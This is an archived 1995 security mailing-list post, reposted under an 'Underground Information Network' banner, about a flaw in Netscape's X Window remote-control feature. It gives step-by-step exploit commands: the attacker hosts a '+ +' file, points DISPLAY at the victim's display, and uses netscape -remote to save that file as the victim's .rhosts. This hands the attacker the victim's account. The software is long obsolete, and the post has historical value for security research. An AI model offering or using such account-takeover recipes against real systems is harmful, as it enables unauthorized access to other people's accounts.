..:-={{Underground Information Network}}=-:.. X-TREME & TECHNOTRONIC Security Collaboration Project http://www.technotronic.com -=(c)=- http://www.x-treme.abyss.com From owner-best-of-security@suburbia.net Sun Oct 1 00:05:17 1995 Return-Path: Received: from yarrina.connect.com.au by mail4.netcom.com (8.6.12/Netcom) id AAA02886; Sun, 1 Oct 1995 00:05:08 -0700 Received: from suburbia.net (suburbia.apana.org.au [192.188.107.90]) by yarrina.connect.com.au with ESMTP id QAA03071 (8.6.12/IDA-1.6); Sun, 1 Oct 1995 16:51:45 +1000 Received: (majordom@localhost) by suburbia.net (8.6.12/Proff-950810) id QAA05895 for best-of-security-outgoing; Sun, 1 Oct 1995 16:31:31 +1000 Received: (proff@localhost) by suburbia.net (8.6.12/Proff-950810) id QAA05885 for best-of-security; Sun, 1 Oct 1995 16:31:19 +1000 Date: Sun, 1 Oct 1995 16:31:19 +1000 From: Julian Assange Message-Id: <199510010631.QAA05885@suburbia.net> To: best-of-security@suburbia.net Subject: BoS: netscape/X remote control exploit Sender: owner-best-of-security@suburbia.net Errors-to: nobody@connect.com.au Reply-To: nobody@connect.com.au Status: RO SOURCE: comp.security.unix RE: Netscape remote control mechanism for X based clients. * There's a huge hole in the Netscape remote control mechanism for the * X-Windows based clients. * Potential impact : anybody can become any user that uses Netscape on any * system without sufficient X security. * Let's suppose that you have an account on a target machine, where somebody * is using Netscape, and either the xhost checking is disabled, or you can * set the xhost yourself (e.g. if you have an account and the target user has * no .Xauthority, as is frequent in university computer rooms). * Then you can gain access to the target user's account using the following * steps : * - make a text file containing only "+ +" accessible (as file, as URL, or * whatever you like) to the target Netscape client. This is quite easy, either * if you have a personal WWW page (http://... URL) or an account on the * target machine (file://... URL), or even by uploading it to an anon FTP * - set your DISPLAY environment variable to the target display * - run the following set of commands : * netscape -noraise -remote "openURL()" * netscape -noraise -remote "saveAs(.rhosts)" * netscape -noraise -remote back * In the second command, the path should be specified whenever possible * (~ is not accepted). * If the target user does not already have a .rhosts and is not looking at that * precise moment, then the chances are it worked !